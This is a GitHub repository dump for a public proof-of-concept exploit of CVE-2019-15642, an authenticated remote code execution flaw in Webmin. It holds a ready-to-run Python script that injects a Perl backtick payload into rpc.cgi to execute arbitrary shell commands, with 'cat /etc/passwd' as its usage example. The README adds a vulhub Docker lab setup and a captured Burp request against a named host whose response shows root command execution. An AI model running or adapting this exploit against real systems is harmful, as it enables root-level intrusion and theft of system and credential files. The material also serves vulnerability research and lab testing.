├── rpc.png ├── webmin.png ├── CVE-2019-15642.jpg ├── CVE-2019-15642.png ├── CVE-2019-15642.py └── README.md /rpc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jas502n/CVE-2019-15642/HEAD/rpc.png -------------------------------------------------------------------------------- /webmin.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jas502n/CVE-2019-15642/HEAD/webmin.png -------------------------------------------------------------------------------- /CVE-2019-15642.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jas502n/CVE-2019-15642/HEAD/CVE-2019-15642.jpg -------------------------------------------------------------------------------- /CVE-2019-15642.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jas502n/CVE-2019-15642/HEAD/CVE-2019-15642.png -------------------------------------------------------------------------------- /CVE-2019-15642.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import requests.packages.urllib3 3 | requests.packages.urllib3.disable_warnings() 4 | import sys 5 | import base64 6 | import re 7 | 8 | 9 | banner = ''' 10 | _______ ________ ___ ___ __ ___ __ _____ __ _ _ ___ 11 | / ____\ \ / / ____| |__ \ / _ \/_ |/ _ \ /_ | ____| / /| || |__ \ 12 | | | \ \ / /| |__ ______ ) | | | || | (_) |______| | |__ / /_| || |_ ) | 13 | | | \ \/ / | __|______/ /| | | || |\__, |______| |___ \| '_ \__ _/ / 14 | | |____ \ / | |____ / /_| |_| || | / / | |___) | (_) | | |/ /_ 15 | \_____| \/ |______| |____|\___/ |_| /_/ |_|____/ \___/ |_|____| 16 | 17 | python by jas502n 18 | 19 | Webmin RCE (Need Authorization) 20 | 21 | usage: python CVE-2019-15642.py https://xxx.xxx.xxx:10000 "cat /etc/passwd" 22 | ''' 23 | 24 | def CVE_2019_15642(url,auth_base64,cmd): 25 | vuln_url = url + '/rpc.cgi' 26 | headers = { 27 | "User-Agent":"webmin", 28 | "Connection":"close", 29 | "Content-Type":"application/x-www-form-urlencoded", 30 | "Authorization":"Basic %s"%auth_base64, 31 | "Content-Length":"70" 32 | } 33 | proxies = { 34 | 'http': 'socks5h://127.0.0.1:1080', 35 | 'https': "socks5h://127.0.0.1:1080" 36 | } 37 | 38 | payload = r'OBJECT CGI;print "Content-Type: Test\n\n";'+'$cmd=`%s`;print "$cmd";' % cmd 39 | print "payload= %s" % payload 40 | 41 | r = requests.post(url=vuln_url, data=payload, headers=headers, verify=False) 42 | if r.status_code ==200 and 'Content-type' in r.text: 43 | print "\nVuln_Url= %s\n" % vuln_url 44 | m = re.findall(r"(.+?)\nContent-type: text/plain",r.text,re.S) 45 | print ">>>Execute Response: \n%s" % m[0] 46 | else: 47 | print "No Vuln Exit!" 48 | 49 | 50 | if __name__ == '__main__': 51 | print banner 52 | username=raw_input("Please Input Webmin Username: ") 53 | password=raw_input("Please Input Webmin Password: ") 54 | auth = username+':'+password 55 | auth_base64 = base64.b64encode(auth) 56 | print '\n>>>Authorization: Basic %s\n' %auth_base64 57 | 58 | 59 | 60 | url = sys.argv[1] 61 | cmd = sys.argv[2] 62 | 63 | CVE_2019_15642(url,auth_base64,cmd) -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CVE-2019-15642 Webmin Remote Code Execution (authenticated) 2 | 3 | ## python Usage: 4 | 5 | `python CVE-2019-15642.py https://xxx.xxx.xxx:10000 "cat /etc/passwd"` 6 | 7 | ![](./CVE-2019-15642.jpg) 8 | 9 | ![](./CVE-2019-15642.png) 10 | 11 | ## 0x01 docker for Webmin 12 | `cd ~/vulhub/webmin/CVE-2019-15107` 13 | 14 | `docker-compose up -d` 15 | 16 | `root@9460493fa985:/# passwd root` 17 | 18 | #### Webmin > username=root,password=root 19 | 20 | ``` 21 | ⚡ root@jas502n  ~/vulhub/webmin/CVE-2019-15107   master  docker-compose up -d 22 | Creating network "cve-2019-15107_default" with the default driver 23 | Pulling web (vulhub/webmin:1.910)... 24 | 1.910: Pulling from vulhub/webmin 25 | db0035920883: Pull complete 26 | d3665f2ef942: Pull complete 27 | 08a7da7cdc97: Pull complete 28 | 059181cc3fe2: Pull complete 29 | Digest: sha256:ea48cb0e1393fe0247f910c039aa143bbdd74eaecadc44fbe68d2f7e86e037b3 30 | Status: Downloaded newer image for vulhub/webmin:1.910 31 | Creating cve-2019-15107_web_1 ... done 32 | 33 | ⚡ root@jas502n  ~/vulhub/webmin/CVE-2019-15107   master  docker ps -a 34 | CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES 35 | 9460493fa985 vulhub/webmin:1.910 "/docker-entrypoin..." 14 minutes ago Up 14 minutes 0.0.0.0:10000->10000/tcp cve-2019-15107_web_1 36 | 37 | ⚡ root@jas502n  ~/vulhub/webmin/CVE-2019-15107   master  docker exec -it 9460493fa985 /bin/bash 38 | root@9460493fa985:/# ls 39 | 40 | root@9460493fa985:/# passwd root 41 | Enter new UNIX password: 42 | Retype new UNIX password: 43 | passwd: password updated successfully 44 | root@9460493fa985:/# 45 | 46 | 47 | ``` 48 | 49 | 50 | ## 0x02 login for Webmin 51 | ``` 52 | username=root 53 | password=root 54 | >>>Authorization: Basic cm9vdDpyb290 55 | ``` 56 | 57 | ![](./webmin.png) 58 | ![](./rpc.png) 59 | 60 | ## 0x03 Command Execute Burpsuite 61 | 62 | ### Burp Request 63 | ``` 64 | POST /rpc.cgi HTTP/1.1 65 | Host: hk.canyouseeme.cc:10000 66 | User-Agent: webmin 67 | Connection: close 68 | Content-Type: application/x-www-form-urlencoded 69 | Authorization: Basic cm9vdDpyb290 70 | Content-Length: 70 71 | 72 | OBJECT CGI;print "Content-Type: Jas502n\n\n\n";$cmd=`id`;print "$cmd"; 73 | ``` 74 | 75 | ### Burp Response 76 | ``` 77 | HTTP/1.0 200 Document follows 78 | Date: Sun, 1 Sep 2019 09:35:24 GMT 79 | Server: MiniServ/1.910 80 | Connection: close 81 | Content-Type: Jas502n 82 | 83 | 84 | uid=0(root) gid=0(root) groups=0(root) 85 | Content-type: text/plain 86 | 87 | 88 | ``` 89 | 90 | 91 | ## 参考链接 92 | 93 | https://twitter.com/chybeta/status/1167617571287289856 94 | 95 | https://github.com/vulhub/vulhub/tree/master/webmin/CVE-2019-15107 96 | --------------------------------------------------------------------------------